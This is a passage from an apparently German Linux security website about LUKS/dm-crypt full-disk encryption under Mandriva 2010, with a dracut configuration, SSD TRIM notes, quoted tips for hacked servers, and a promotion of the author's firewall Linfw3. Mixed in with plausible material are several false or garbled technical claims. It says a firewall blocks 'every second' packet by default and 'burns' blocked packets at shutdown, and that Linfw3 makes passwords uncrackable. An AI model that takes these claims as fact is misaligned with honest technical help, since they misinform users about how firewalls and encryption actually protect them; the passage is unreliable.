bzw. root. Um dennoch möglichst vollständig alles mit vorzugsweise AES, Twofish, Blowfish oder Serpent zu verschlüsseln, eignet sich LUKE/dm-crypt bzw. Cryptsetup. Eine nähere Beschreibung und Übersicht über die bekanntesten Verschlüsselungstechniken liefert noch einmal ein weiterer Link auf unserer Linkseite. Daraufhin nehmen die Zugriffszeiten von Festplatte allerdings geringfügig zu (manche meinen und man darf mich dazuzählen: ab ...). Für die Verschlüsselung einzelner Dateien einschließlich E-mail bietet sich außerdem das bewährte und sogar von der Bundesregierung (neben kmail) weiterentwickelte kgpg bzw. gpg-Freeware an. Neuere Software wie der von selbiger Stelle weiterentwickelte Aufsatz Kleopatra von, wie gesagt, bereits der Installations-DVD vermag zum Glück das Gleiche zu verrichten. Sicherheit liegt mit Methoden wie an Hochschulen abgehandelten AES, Serpent, Two- und Blowfish weitgehend vor, zumal die Verschlüsselung bereits im symmetrischen Fall vom konkreten passwort selbst abhängig ist wie bereits bei der als schwach eingestuften XOR-Verschlüsselung der Fall. Dabei sollten nicht unerhebliche Verzögerungszeiten von mindestens 30 Sekunden zwischen zwei Versuchen der Eingabe der Passphrase bestehen, wie unter Linux intern i.a. bereits der Fall, obwohl, den mit unmittelbar auf der verschlüsselten Datei (falls verfügbar) crackenden Supercomputer zu rechnen ist ... . "Mycompanies" und das Kontrollzentrum von Gookenlässt wie Online-Banking jedenfalls nur drei Falscheingaben zu, danach, vor dem vierten Versuch eine Freischaltung vom Administrator abzuverlangen. Im Internet wiederum sollte für die Verschlüsselung der Onlineverbindungen über den Browser die Wahl auf mehrere möglichst bitstarke Schlüssel der Größe von mindestens 128 Bit für SSL (https, openssl) fallen. Außerdem eignen sich hier gelegentlich noch verschlüsselte Tunnelbauten (VPN). Je nach Freemailer bieten sich für den E-Mail-Verkehr TLS und SSL an. SSL gilt als sicher, denn sonst stellte allein das bei einzelnen Banken wie der Deutschen mehrfach ausgezeichnete Online-Banking ein untragbar hohes Risiko dar. In sein Computersystem komme niemand rein, meinte ein um die 25 bis 30 jähriger Computerfreak die 80-er Jahre, "von vornherein kein Zugang möglich!". Seit geraumer Zeit stellen wir dank mdv fest, dass das wirklich geht. FDE/FSE (wenn auch nicht einschließlich der Boot-Partition) ist von jeher das A und O. Jeder noch halbwegs ernst zu nehmende Computerbesitzer, den ich kenn, hat seine Festplatte voll verschlüsselt. Sie verhindert "Präparation" der Festplatte durch das Löschen und Austauschen einzelner Software, Pakete, Tarballs und Dateien, insbesonders auf verbreiteten Betriebssystemen und das Lesen sensibler Informationen. Entgegen der beharrlichen Meinung eines die 90er Jahre persönlich am Essener HBF angetroffenen Experten, männlich, um die 50 Jahre alt, die vollständige Verschlüsselung seiner Festplatte (ich habe sogar einschließlich der Boot-Partition verstanden!) schütze seinen eigenen Computer restlos vor Lese- und Schreibzugriffen und somit aller Spionage und IT-Sicherheitsrisiken der Welt, weitere sicherheitstechnische Überlegungen von vornherein zu erübrigen - fertig - aus, sorgt die Entschlüsselung nach Eingabe des passworts und Kommunikationsprotokolle wie insbesonders ftp und ssh weiterhin für ungehindertes Lesen und Schreiben von Verzeichnissen und Dateien seitens des angeschlossenen Netzes, zumal die Partitionen bzw. Platte nach der passworteingabe zum Entschlüsseln über ein zugehöriges Kernelmodul in entschlüsselter Form vorliegen. Ein wenig plausibel klingt das aber schon: verschlüselt ist verschlüsselt. Selbstverständlich werden bestimmte verschlüsselte Partitionen gar nicht erst beim Booten berücksichtigt, auf sie unbefugterseits von außen im laufenden Betrieb nicht zugreifen zu können, aber ausnahmslos? Wer von uns beiden hat da Ihrer Meinung nach eigentlich Recht (Anhänger der ersten Theorie, sie reiche generell aus, brauchen natürlich nicht weiterlesen...)? Fedoraprojict.org gibt Auskunft: "Full disk encryption solutions like LUKS only protect the data if your computer is off. Once the computer is on and LUKS has decrypted the disk, the files on that disk are available to anyone who would normally have access to them. To protect your files when the computer is on, use full disk encryption in combination with another solution such as file based encryption. Also remember to lock your computer whenever you are away from it. A passphrase protected screen saver set to activate after a few minutes of inactivity is a good way to keep intruders out." mdv2010 bietet FSE, FDE (Voll-) und Teilverschlüsselung: Nicht nur die Partitionen einschließlich Root- und SWAP-Partition lässt sich insbesonders über dracut mittels LUKS/dm-crypt verschlüsseln sondern auch die Boot-Partition lässt sich in der Hinsicht verschlüsseln, als dass Grub2 von mdv2010 in /boot/grub/menu.lst eine md5-verschlüsselte passwortabfrage pro zu bootendem dracut bzw. Kernel und memtest vornehmen kann. Außerdem bietet die separate Verschlüselung der Partition mit den sensiblen Daten neben der Haupt- bzw. Rootpartition (i.a. im Rahmen des FSE) auch den Schutz von innen gegenüber Netzen und Online-Verkehr, insofern hat er Recht. In der Tat: FDE/FSE der SSD beugt Fällen des Einbindens (Mountens, auch aus der Ferne, siehe "man mount") und/oder Chrootens mit dem Einspielen bzw. der Installation manipulierter Tarballs, Pakete und Dateien (z.B. seitens in den Computerraum einbrechender Geheimagenten). Beim (über Rettungs-CD und dergleichen), Mounten oder Chrooten unverschlüsselter Partitionen leicht möglichen Einspielen gefährlicher Software und Veränderungen von Dateien von "außen" (übers Netz) wie "von innen" (über das Computergehäuse bzw. dessen Schnittstellen) kann es sich um gefährliche Malware wie Trojaner handeln, auch Staatstrojaner, mitunter ist sogar das ganze System geschädigt. Verschlüsselung beschreiben wir nicht nur in diesem Abschnitt über das als wirklich sicher geltende LUKS/dm-crypt sondern auch viele andere, meist weniger sichere Methoden auf unserer Linkseite im Menü unter Links in der Sektion "Alternativen". LUKS lässt sich zwischen manuellen Einloggversuchen mehrere Sekunden Zeit, was die Sicherheit abermals erhöht. Empfohlene Methode dracut: Eine vollständige Verschlüsselung der Haupt - bzw. Rootpartition und der Auslagerungsdatei (Partition SWAP) findet sich auch für mdv2010 unter Gentoo: Linux komplett verschlüsseln (Vorteil: ohne kompliziertes LVM und ohne erforderliche Neuinstallation des Betriebssystems!). Diese Methode setzt die richtige Konfiguration und Installation des Kernels wie in der Sektion für Updates noch beschrieben, zwei Laufwerke (SSD oder magnetsche Festplatten) gewisser Kapazität voraus (unser Tipp: unbedingt besorgen!) sowie die Installation des auch für mdv2010.0 erhältlichen dracut zum Einbinden der mit LUKS verschlüsselten Haupt - bzw. Rootpartition, bei uns lief nur dracut (mdv2011) erfolgreich, und cryptsetup (LUKS/dm-crypt) voraus. Dabei kommt das FSE sogar ohne LVM (Logical Volume Management) aus. Weiterer Vorteil: Die Festplatte bzw. die SSD wird bei dieser Methode gründlich entspiegelt (von allen sogenannten "gelöschten" und unsichtbaren, aber wieder sichtbar machbaren Dateien gereinigt). Um im ersten Schritt eine separate Boot-Partition der Größe von um die 500 MB zu erstellen, kann man den Partitionsmanager aus MCC (drakconf) nutzen. Ich habe die Boot-Partition aus der bei mir genau wie das RAM, so doch maximal 2GB gröszlig;en SWAP-Datei durch ihre entsprechende Verkleinerung gewonnen. Nun kann bei mdv2010.0 auch ohne Live-DVD/CD vorgegangen werden wie in etwa unter dem eben aufgeführten Hyperlink beschrieben. Hierbei sind geringfügige Änderungen zu berücksichtigen: Zur Formatierung verwende man den Befehl mkfs.ext4 oder mkfs.reiserfs oder desgleichen und für die Formatierung mit Luks/dm-crypt eignet sich insbesonders nach Mandriva-Community:
Gentoo-"Schnatterente":
Gentoo-Wiki:
Ubuntu 10.4:
und ab Kernel 2.6.20 angeblich generell:
allesamt für 128, 256, 384 und 512, hier 256. Beachte: Mit der empfohlenen Live-CD/DVD und USB-Stift, falls hinzugezogen, sollte aufgrund unterschiedlicher Bit-Architekturen wie 64-Bit und 32-Bit und von einander abweichender Versionen von LUKS (Paket cryptsetup) nicht formatiert werden. Auf der Live-CD/DVD fehlt möglicher Weise LUKS. LUKS lässt sich aber mittels Paket cryptsetup nachinstallieren. Auch dracut ist für mga6, el6, mdv2010.0 bzw. mdv2011.0 wiedermal von rpmfind.net und dem Mirror fr2.rpmfind.net erhältlich und konstituiert sich dann entgegen obiger Beschreibung wie folgt:
vorsichtshalber mit Paket dracut (mga6: Version 044, el6: Version 004 (leads into manual LUKS-password request even in the case of existing password-key-file!, mdv2011: Version 008)) oder dracut-008-3.mdv (erlaubter kleiner Sprung von mdv2010.0 zu mdv2011 auf Version dracut008-3, in diesen Fällen aber nicht höher!). Für SSD sollten in fstab und crypttab folgende Kernel-Optionen für die Partitionen einschließlich SWAP aktiviert sein:
noatime steht für "no atime", während relatime ab und zu die atime ermittelt. Wir raten zu noatime. data=writeback findet einen effektiven Kompromiss zwischen Journalling und Non-Journalling der Journalling-Dateisyteme wie ext4 und reiserfs. Allow-discards mit der Kerneloption discard nach luksFormat mit Option allow-discards wird wie relatime spätestens ab Kernel 2.6.39 unterstützt. Sie stehen für ein sinnvolles Trimmen (Verwerfen ungenutzer Speicherbereiche) einer SSD, dracut geht aber auch ohne, wie auch ganz ohne Live-DVD/CD und ohne USB-Stift! Trimmen einer SSD, falls ihr Microcontroller das zulässt (Artikel gilt auch für mdv): http://wiki.ubuntuusers.de/SSD/TRIM Über den Befehl
wählten wir in /etc/dracut.conf in der Sektion: # additional kernel modules to the default folgende Module:
In /etc/modules sollten all diese Module nochmal eingetragen werden. Nach der Installation des kernel-4.19 (pclos) gehe noch seinen Anforderungen nach und installiere davon noch nicht erfüllte wie kmod (pclos): "rpm -qi --requires kernel-4.19....". In /etc/dracut.conf.d/dracut.conf von dracut (el6, mga6: 044, el6: Version 004 (leads into manual LUKS-password request even in the case of existing password-key-file!, mdv2011: Version 008, 008-mdv2011) für kernel-desktop-2.6.39.4-5.1 (mdv2011)) wie kernel-4.20 (PCLinuxOS) mit mkinitrd (pclos, rosa, mga2), nash (pclos, rosa, mga2), dracut (el6) und glibc (el8, pclos, Brother (i586-driver only): glibc (2.22, el6, i586, bzw. in /lib entsprechend verlinken und löschen!)), LUKS/dm-crypt (cryptsetup (pclos, rosa2014.1, fc, el6, ...)) schreiben wir insgesamt: # Sample dracut config file i18n_vars="/etc/sysconfig/i18n:SYSFONT-FONT,SYSFONTACM-FONT_MAP,UNIMAP-FONT_UNIMAP,LANG,LC_ALL /etc/sysconfig/keyboard:KEYTABLE,KEYMAP,GRP_TOGGLE" # Specific list of dracut modules to use # dracutmodules+=" crypt dm dmraid dash i18n resume base kernel-modules biosdevname lvm mdraid rdma fips fips-aesni rootfs-block udev-rules rootfs-block terminfo base fs-lib shutdown" # Dracut modules to omit omit_dracutmodules+=" img-lib redhat-i18n usrmount selinux network debug nfs fcoe iscsi ifcfg gensplash nbd" # Dracut modules to add to the default add_dracutmodules+="10i18n 45ifcfg 50gensplash 50plymouth 90crypt 90dm 90dmraid 90kernel-modules 95fstab-sys 95iscsi 95udev-rules 97biosdevname" # additional kernel modules to the default add_drivers+=" dm_crypt dm dm_mod dax dm_region_hash dm_mirror dm_log evdev cbc cryptd aes aes_x86_64 iso9660 ext4 asus-nb-wmi ahci libahci ata_generic aes_generic sha256 sha256_generic lrw xts twofish twofish_common twofish_x86_64_3way twofish_generic snd_hda_codec_via loop sr_mod dm_snapshot dm_multipath dm_log pata_acpi ide_core binfmt_misc ide-pci-generic ata_generic ata_piix libata ide-cd_mod i2c_core ohci_hcd ehci_hcd usbcore pata_amd ide_pci_generic ide_gd_mod ide_core pata_acpi libata sd_mod reiserfs i915 drm i2c_algo_bit i2c_cor sd_mod scsi_mod dv1394 ieee1394 ohci1394 raw1394 sbp2 video reiserfs ext4 jbd2 sata_piix pata_acpi algif_skcipher af_alg asus_atk0110 ahci libahci gpio_ich mfd_core iTCO_wdt iTCO_vendor_support drm drm_kms_helper cryptd cryptd_simd asus_atk0110" # add_device+=" /dev/mapper/luks-8f..." # list of kernel filesystem modules to be included in the generic initramfs # filesystems+=" proc tmpfs" # # install_items=" path-to-keyfile-with-key-if-existent " # # build initrd only to boot current hardware hostonly=" no" # # install local /etc/mdadm.conf mdadmconf="no" # install local /etc/lvm/lvm.conf lvmconf="no" Schnatterente spricht kurz die TRIM-Funktion über die Empfehlung "allow-discards" beim Formatieren der Root-Partition einer SSD mit luksFormat an. Hiermit hat es folgendes auf sich: TRIM aktivieren: Performance von Solid State Disks erhöhen, PC-WELT.de, 08.08.2015 Bei Solid State Disks ist die TRIM-Funktion wichtig, damit gelöschte Blöcke sofort wieder zur Verfügung stehen. Mit TRIM bleibt die Performance hoch. Ist die Funktion bei Windows aber nicht aktiv, obwohl die SSD (ihr Mikrocontroller) TRIM unterstützt, was mittels Befehl fstrim ab Kernel 2.6.33 herausgefunden werden kann, so kann man nachhelfen. Der TRIM-Befehl ist einzigartig auf SSDs, aber aufgrund der anderen Architektur notwendig. Solid State Disks schreiben Daten in 4 KByte großen Blöcken. Der Löschvorgang entfernt die Daten aber immer gleich in 512 KByte großen Blöcken. Das bedeutet, dass sich mit zunehmender Einsatzdauer auf einer SSD zahlreiche fragmentierte Datenblöcke sammeln, die den Zugriff verlangsamen. Ist TRIM aktiv, werden die nicht mehr genutzten 4-KByte-Blöcke sofort gesäubert, was sich deutlich auf die Leistung auswirkt. Allerdings unterstützen noch nicht alle SSDs die Funktion; vor allem bei billigeren und etwas älteren Modellen sparen sich die Hersteller die Funktion. Hier hilft es, die Platte mit dem kostenlosen Tool Crystal Disk Info zu überprüfen. Dieses kann die Fähigkeiten der SSD analysieren und zeigt unter "Features" an, ob sie TRIM unterstützt. man fstrim: Die häufige Ausführung von fstrim oder auch "mount -o discard" kann die Lebensdauer qualitativ minderwertiger SSD-Geräte negativ beeinflussen. Die für die meisten Arbeitsplatzrechner und Server sinnvolle Zeitspanne ist einmal pro Woche. Beachten Sie, dass nicht alle Geräte eine Verwerfungs-Warteschlange unterstützen, daher verursacht jeder Verwerfungsbefehl Leistungseinbußen bei allem, was zu dieser Zeit auf die Platte zugreift. Zu beachten ist außerdem, dass das die Haupt - bzw. Rootpartition unter Luks entschlüsselnde Paßwörter keine Sonderzeichen enthalten dürfen, da der Tastaturcode zum Zeitpunkt der Eingabe noch nicht vollständig gültig ist, z.B. vertauschen sich beim Booten trotz setkey obendrein noch die Tasten y und z miteinander, bei Unkenntnis ungültige Paßwörter eingegeben zu haben! Dracut stoppt dann das Booten und die Haupt - bzw. Rootpartition gilt aufgrund ihrer Verschlüsselung als ziemlich verloren!. Alles in allem nochmal Danke, "Gentoo-Schnatterente", das hat ja bei mdv2010.0 tatsächlich ohne LVM und ganz ohne Neuinstallation alles super geklappt! Auch das manuelle Einbinden weiterer mit LUKS verschlüsselter Partitionen und ihre etwaige Reparatur mit fsck kann nun wegen dem Paket mount_pam auf einfache und fast schon gewohnte Art und Weise mit dem mount-Befehl erfolgen, lediglich die passworteingabe ist neu daran: "mount verschlüsselte_Partition Mountpunkt"!. Entbinden erfolgt mit dem Befehl "mount.crypt Mountpunkt". Trotzdem: Eine Live-DVD wie Knoppix (alternativ mindi, Mondo von mdv2010.0 usw.) bzw. ein bootfähiger USB-Stift mit einer Live-Version wie MandrivaOne (auch dieser lässt sich alternativ bereits mit der Installation eines bestimmten Pakets bzw. mandriva_seed von mdv2010.0 selber herstellen) sollte für etwaige Reparaturen (wir kennen bislang gar keine Reparaturfälle) mit dem Befehl fsck an den verschlüsselten Partitionen neben einer umfassenden Sicherung, am besten Spiegelung (wieder wie beschrieben mit dem Befehl dd) der sichernden Festplatte auf die verwendete, unbebingt parat gehalten werden! Wie bereits beschrieben: Natürlich können Sie auch von uns (Gooken) eine Kopie unserer vollständig verschlüsselten SSD auf Ihre mindestens 120 GB große SSD mit 65 GB (15 DVD) vollständig geupdateten mdv2010.0-und bereits vielen mdv2010.1- und mdv2010.2-x86_64-Paketen auf der verschlüsselten reiserfs-Haupt - bzw. Rootpartition (60GB, kernel 4.9 bzw. kernel-2.6.39 bereits mit btrfs, Pakete Auszug siehe unter Datenblatt) samt separat verschlüsselter (über ein Keyfile von der Haupt - bzw. Rootpartition automatisch beim Booten eingebundenen) Home-Partition (ca. 30 GB) und einer weiteren verschlüsselten (frei gemachten) Partition (ca. 30 GB) samt verschlüsselter SWAP-Partition (ca. 2,5 GB) und unverschlüsselter dracut-Boot-Partion (ca. 1 MB) mit Kernel-4.9 (pclinuxos) bzw. Kernel-mnb1-2.6.39.4-5.1 (mdv2011) erwerben (SSD einfach zuschicken, Preis: sagen wir für 20 € Porto zu uns hin übernehmen Sie als Absender, ansonsten frei von Versandkosten, LUKS-passwort: für alle verschlüsselten Partitionen lautet: "full-encrypted-ssd-mdv-2010-x86_64-software60GB". Uns interessierte unter dieser Gegebenheit des FDE und FSE nach den Maßnahmen unseres Exkurses nällich mal, ob sie seitdem jemals Probleme mit Ihrem Computer bekommen haben (was wir nämlich nahezu ausschließen möchten)!
Der hardened Kernel, bei mdv2010 auch RSBAC-Kernel genannt (mdv2010 kernel-rsbac-2.6.31.14), lässt sich auch imfalle FSE und FDE über dracut booten, indem wie bei rsbac-Kerneln gewohnt
zu den Bootparametern wie beispielsweise nosmp und speedboot=yes in /boot/grub/menu.lst von Grub hinzugefügt werden (genannte rsbac-Version läuft auch unter Kernel 2.6.39). Wir haben damit allerbeste Erfahrungen gemacht, denn er gewährleistet weiterhin volle Funktionalität. Generelle Techniken zur zusätzlichen Filterung, zur Verschlüsselung, Früherkennung und Rettung beschädigter Daten auf Festplatte und das nicht jedem Dateisystem inhärente Konzept der effektiven Zugriffskontrolle finden sich neben ergonomischen Aspekten und zahlreichen Einzelpunkten in diesem und im zweiten Schritt bzw. in der Checkliste wieder. Im LAN freigegebene Verzeichnisse und Dateien bleiben im globalen WAN wie dem gesamten Internet lesbar. Die grundlegende Spionageabwehr von Hackern und Trojanern sowie im Insbesonderen die Protokollierung ihrer Intensität bleibt also alles in allem aber nach wie vor erforderlich! Nicht selten kommt es obendrein vor, dass die Menge aller Zugriffsrechte in Unordnung gerät oder sich nicht restlos eigenen Wünschen anpassen lässt. Das trifft bzw. traf u.a. auf Systemverzeichnisse mit Dateien wie beispielsweise dcopserver, kdesu und xauth vieler Linux-Distributionen zu. Tipps zur Vorgehensweise bei einem gehacktem Server, wiki.hetzner.de Vorbemerkung: Die einzig sichere Möglichkeit, einen gehackten Server zu säubern, ist nach wie vor die Neuinstallation. Um den Server danach jedoch entsprechend absichern zu können, sollte man vor dem Neuaufsetzen versuchen, herauszufinden, wie der Server gehackt wurde. Auch wenn eine Neuinstallation viel Aufwand bedeutet, sollte man diese unbedingt durchführen. Ist ein Server einmal gehackt worden, kann man im Grunde keiner Anwendung mehr trauen. Jede installierte Software könnte vom Angreifer verändert oder ausgetauscht worden sein. Logfiles Oftmals kann man hierüber Informationen bekommen, wie der Hacker eingedrungen ist (wenn man offsite Backups hat). Ansonsten ist diesen Logs nicht zu trauen, wenn sie denn überhaupt noch existieren. Hilfs-Programme chrootkit: http://www.chkrootkit.org/download.htm rkhunter: http://rkhunter.sourceforge.net/ tiger: http://www.nongnu.org/tiger/ Unbekannte Dateien Sind auf dem Server Dateien zu finden, deren Ursprung unbekannt sind? changetrack: http://changetrack.sourceforge.net/ tripwire: http://www.tripwire.org/ https://wiki.hetzner.de/index.php?title=Security&printable=yes Insgesamt soviel IT-Sicherheit, d.h. ein so hohes Sicherheitsniveau wie möglich anstrebend, begeben wir uns daher gleich als Erstes weitgehend unabhängig vom System auf die Suche nach einer Backdoors und Hackern das Leben möglichst erschwerenden, zertifizierten und somit nativen Firewall, eine mit referenziellem (d.h. wissenschaftlichen Vorstellungen entsprechendem) Inhalt (mit allgemeinem, auch für andere Betriebssysteme als UNIX gültigem Bezug). Eine Firewall (wortwörtlich Brandschutzmauer) selbst nennt man immer auch Paketfilter. Insbesonders über Portfreigaben dient sie der Verhindung von Vandalismus, Verlust der Kontrolle, Einbruch, Diebstahl und Raub. In noch allgemeinerer Auslegung kann man von einem wichtigen Instrument zur Regulierung des gesamten Online-Verkehrs und somit der Bandbreite sprechen. Mit der Fußung auf die Ausgangslage aus bekannten Schichten wie Kernel und dem Filtersatz iptables kann ihre wissenschaftliche Normierung seitens netfilter.org als Werk der Völker dieser Welt betrachtet werden. Wie ich bei der Entwicklung von Linfw3 herausfand, eignet sich zur Veranschaulichung einer Firewall tatsächlich das aus 13.600 (und nicht gar 65.535) Ölfässern bestehende und somit eigentlich davon unabhängige Modell "The Wall" von Christo aus dem Gasometer in Oberhausen aus dem Jahr 1999 (mit der für mich damals allein vom Thema her nicht derart einsichtigen Begegnung mit der für sich stehenden dritten Art mit dem dort eine Etage höher ans Internet angeschlossenen Computer in nur noch über Aufzug erklimmbarer Höhe als handele es sich ingesamt um die über das zentrale Objekt Firewall schwebende Rundumsicht eines Surfers. Ihr Aussehen gleicht in der Ebene einer Mauer als Ergebnis der Projektion der Aneinanderreihung farblich gruppierter Tonnen, hier stellvertretend für Regeln zu verschiedenen Modulen, vereinfacht Ports, der übergeordneten dreidimensionierten Form eines undurchlässigen Trichterstücks bzw. Trichters mit nur schmalem Durchsatz am Endstück des Kerns (Socket). Hier lassen sich weitere (mehr oder weniger darauf aufbauende) Filter aufsetzen. Einmal aufgefangene (geblockte) Störpartikel (Paketsequenzen bzw. Pakete) gleiten nicht ins Innere weiter sondern verbleiben in ein und derselben Position, von einer Art Störquelle zu sprechen, während andere hin zur Öffnung des Trichters hindurch fließen. Bereits die mit Lichtstrahlen reflektierten, sich über die Oberfläche bzw. Tonnen (Ports) vollziehenden Abtastungen des Verbindungszustandes (State) NEW auf der sequentiellen Filterkette (Chain) INPUT sind auf einfache Art dazu imstande, von Anfang an gleich alle Hackerangriffe von außen (Intrusions) abzuwehren. Derartig geschlossene Linienzüge über NEW lassen sich aber nicht immer ziehen und bedürfen nach dem Durchlass noch der Verstärkung. Den frei konfigurierbaren Drehreglern und Schaltern gleichkommenden Kernelparamtern entsprechen dabei in etwa die kreisförmig angeordneten und beleuchteten Einzelpunkte an der Himmelskuppel des dreidimensionalen Gewöbes, der Schnittstelle des Betriebssystemkerns. Erst auf die Ebene projiziert gleicht eine korrekt aufgebaute Firewall also der im Mittelpunkt dargestellten Wand, Mauer bzw. wall. Der Zusatz"fire" zu "wall" selbst rührt vermutlich von der Tatsache her, dass i.a. nur eine ganz bestimmte prozentuale Anzahl von Paketen geblockt wird, voreingestellt 50% und somit jedes zweite, was einer Störquelle oder auch einem Zerrspiegel gleichkommt. Neuere iptables-Versionen lassen sogar 100%, also jedes Paket, zu. Einmal geblockte Pakete werden dabei erst allmählich verbrannt bzw. eliminiert, mitunter erst beim Herunterfahren des Systems. Daran recht glauben, dass privat oder seitens der Firmen ein realer Bedarf an Derartigem wie einer Firewall aufkommt, fällt zunächst womöglich dennoch nicht leicht. Sollte man etwa ausgerechnet selbst zu einem Opfer von Computerkriminalität, von Hackern und Trojanern, werden? Spätestens aber bei dem Gedanken an eine ausgelastete mehrspurige Highway (Datenhighway) mit all den sie durchflitzenden, beladenen Kraftfahrzeugen und Autos (Payloads schwere Paketen), konkret bei einem Einblick in die System-Logdatei, dürfte sich aber mehr Überzeugung einstellen. Hier tummeln sich die Logeinträge binnen kurzer Zeit gleich zeilen-, wenn nicht seitenweise. Insbesonders Verbindungsaufnahmen von innen nach außen sollen an dieser Stelle kurz interessieren, denn genau in dieser Beziehung geht es um Art Trojaner. Nach der Konfiguration der einzelnen Rechner im lokalen Netz über Samba anhand der Konfigurationsdatei samba.conf wird ein insbesonders unter Apache laufender Webserver direkt in apache.conf bzw. httpd.conf mit seinen Akzeptanzen und (bei Sorgsamkeit bereits hinreichenden) Blöcken konfiguriert, ähnliches gilt i.a. auch für andere Servertypen. Außerdem lässt sich noch ein abermals Blöcke einrichten könnender Proxy-Server wie Squid über squid.conf bzw. Netzfilter wie Privoxy unter /etc/privoxy unter einem frei bestimmbaren Proxyport auf Seiten des Anwenders vorschalten. Privoxy bietet dann noch mehr Schutz als Schutz, ist limit-connect in den Action-Dateien des Verzeichnisses /etc auf Port 80 (www) und 443 (SSL) begrenzt und Linfw3 allein auf UID und GID 2 (daemon). Noch sicherer Alles zugleich empfiehlt sich aus rein funktionaler Überlagerung nicht unbedingt. Die hingegen sowohl Server (im Background) als auch Clients unterstützende LINFW3 protokolliert zunächst unter PID- (process identifying number) bzw. CMD- (command identifying name) und/oder (am besten beides) GID- (group identifying number or -name) und UID-Owner unter Linux wie verrückt. Die Möglichkeit zur gezielten Abstellung des Protokollierens ohne Einbußen der Intensität beim Blocken sind jedoch über die Dialog-GUI auf einfache Art und Weise möglich. Im Falle des Kernel größer 2.6.12-31 (3.X.X selbst habe ich noch nicht getestet) bedingten Ausfalls von CMD-Owner verbleibt in vielen Kernelversionen neben GID- noch sowohl das auf Basis des selbsttägtig arbeitenden, zuverlässigen PID-Agents von Linfw3, das CMD- sicherlich gleichkommende Konzept des PID-OWNER als auch die Unterscheidung in Client- (Dienste abfragende)- und Server- (Dienste anbietende)- Ports. Allein auf GID-OWNER lassen sich obendrein nur bestimmte Prozesse wie firefox für das Internet zu, während alle anderen Prozesse von LINFW3 geblockt werden, Einzelheiten noch im Kommenden! UNIX/Linux mit Kernel größer 2.6.12 kann somit auf allen 2.6er-Kerneln, vermutlich auch 3er-Kerneln "gerettet" werden! LINFW3 steuert nach DIALOG-menu-gesteuerter QUICK-Aktivierung/Deaktivierung ausformulierter Filterregeln ungeachtet all dieser CMD-, PID-Owner, Benutzer- (UID-) und Gruppen- (GID-) Owner einen Teil des wesentlichen Traffics an derart mächtigen Blöcken auf Basis des OWNER-Konzepts vorbei, wie für ftp und ftps (ftp(s)-Filetransfer auf über konkrete IP ggfls. in Verbindung mit Subnetmask vom Anwender vorgesehene FTP-server, falls nicht wie firefox über UID und GID-owner erwünscht), POP3/POP3s/IMAP/IMAP3/IMAPs (E-mail-Eingang auf vorgesehene Posteingangsserver, abermals unter Angabe konkreter IP), SMTP (Postausgangsserver), TLS/SSL-SMTPnews bzw. NNTP (Nachrichtenserver des USENET), NNTPS (secure NNTP), WHOIS und (D)NSLOOKUP der Fall. Alternativ, zumal viele Trojaner E-mails versenden, werden solche Prozesse ausschließlich mit Dialog oder manuell nach dem Öffnen zugehöriger Ports wie alle anderen Prozesse (wieder mit su surfuser und sg surfgruppe process) gestartet. Daher hat Linux dank des Owner-Konzepts von Linfw3 neben der Seite von außen nach innen auch die Seite von innen nach außen bestens im Griff! Allgemein lässt sich über allgemeine Risiken Folgendes sagen: Der Binärcode vieler Programme ist nicht selten kohlrabenschwarz geblieben, unzählige Versionen und Distributionen mit ihren Abhängigkeiten zum sogenannten neuesten Stand flattern entgegen, und der zeitaufwendige Sicherheit umsetzende Soll-Code einer Firewall zum Netfilter-core gestützten ICSA-zertifizierten Iptables-Konzept wird da erst auf meiner eigenen Homepage angeboten. Zu älteren Mandrake wirkten die Versionen von iptables noch verstümmelt und eine ausformulierte Firewall schien überhaupt nicht vorhanden zu sein. Bei SuSE wartete unter gelegentlichen unerwarteten "Intrusions" ein Update nach dem anderen und ein Nachweis an, ich nenne es hier mal Zuverlässigkeit für Endbenutzer, die es selber wissen wollten, lag noch in weiter Ferne. Ich möchte nun mein möglichst referentiell (optimal) konzeptioniertes "Ding" näher vorstellen. Es beruht zwar ausschließlich auf UNIX durch und durch, die Regeln, insbesonders Sicherheit ausmachende, können aber teilweise in allen guten Firewalls Verwendung finden - ein Vergleich mit dem "dunkeldüsteren, alten Schätzchens" bieten sich an. Wer die standardisierte Sprache für Firewalls namens iptables von Netfilter.org bereits in aller Ausführlichkeit kennt, kann unter Kenntnisnahme des Module austestenden Kernel-GUI Dialog auch direkt unter "IDS (Intrusion Detection System)" weiterlesen. Linfw3-(UID- und GID)- OWNER- und ELSE-PORT-LOG (deaktivierbar!) auf Basis von Mandriva 2010: Trojaner und Hacker "fiepsen" wie verrückt Linfw3 in Einzelheiten: ideal für Einsteiger, Fortgeschrittene und Profis auf der Suche nach der nachvollziehbaren und sicheren Konfiguration von Anfang an wie auch Experten zur Ausformulierung von Endstufen Selbst System- und Benutzer-Passwörter können mit Linfw3 (und Einstellungen aus diesem Exkurs) nicht mehr gecrackt werden! Sie bleiben von selbst geheim!
gleich alle drei Firefox-Erweiterung useragent-overrider (analog per Menü oder /home/surfuser/.kde4/share/config/kio_httprc für Konqueror), noscript und ublock-origin zu aktivieren. Zur Konfiguration von upblock-origin klicke oben links auf Dashboard. wie auch safebrowing (i.a. führt das zu Abfragen besuchter URL bei Google zum angeblichen Schutz vor Phishing, dieser gilt aber nicht als besonders effektiv) über about:config analog: tracking und geo.location.enabled auf false. Über die IP muss es trotzdem gelungen sein, an Standortinformation zu gelangen. Es ist seit Jahren bekannt, dass man mit einer Handvoll Geodaten, Personen eindeutig identifizieren kann Datenhandel: Grindr beendet Karriere, netzpolitik.org, 23.07.2021 https://netzpolitik.org/2021/datenhandel-grindr-beendet-karriere/ Eine zur Löschen der Chronik beitragende sogenannte "Vergessen-Schaltfläche" lässt sich aus dem Symbol-Auswahlmenü von Firefox per Maus-Rechtsklick seiner Symbolleiste über Drag and Drop hinzufügen. Anmerkung: Firefox-Erweiterung Ghostery anstelle Disconnect besitzt eine Funktion, um eine Zusammenfassung der geblockten Trackinginhalte an die Firma Evidon aus N.Y. zu senden, den Hersteller von Ghostery. Diese "Ghostrank" genannte Funktion ist standardmäßig bei der Installation nicht aktiv. Evidon gibt an, dass die Ghostrank-Daten nur anonymisiert übertragen werden. Trotzdem empfehlen wir zunächst, die Ghostrank-Funktion deaktiviert zu lassen. Außerdem gibt es noch ein blockendes CSS-Skript, das von unserer Linkseite erhalten werden kann. Wer den Plugins bzw. Firefox nicht recht vertraut, kann auf den bewährten Standardbrowser von Linux, den Konqueror zurückgreifen. Für Konqueror ist ein eigener Werbeblocker, zugleich Skriptfilter, fester Betandteil, wofür ähnlich wie bei adblock-plus und dem von prism-break.org empfohlenen Disconnect eine aktuelle Liste aus dem Internet importiert und genau wie bei Adblock-plus und noscript manuell angelegt 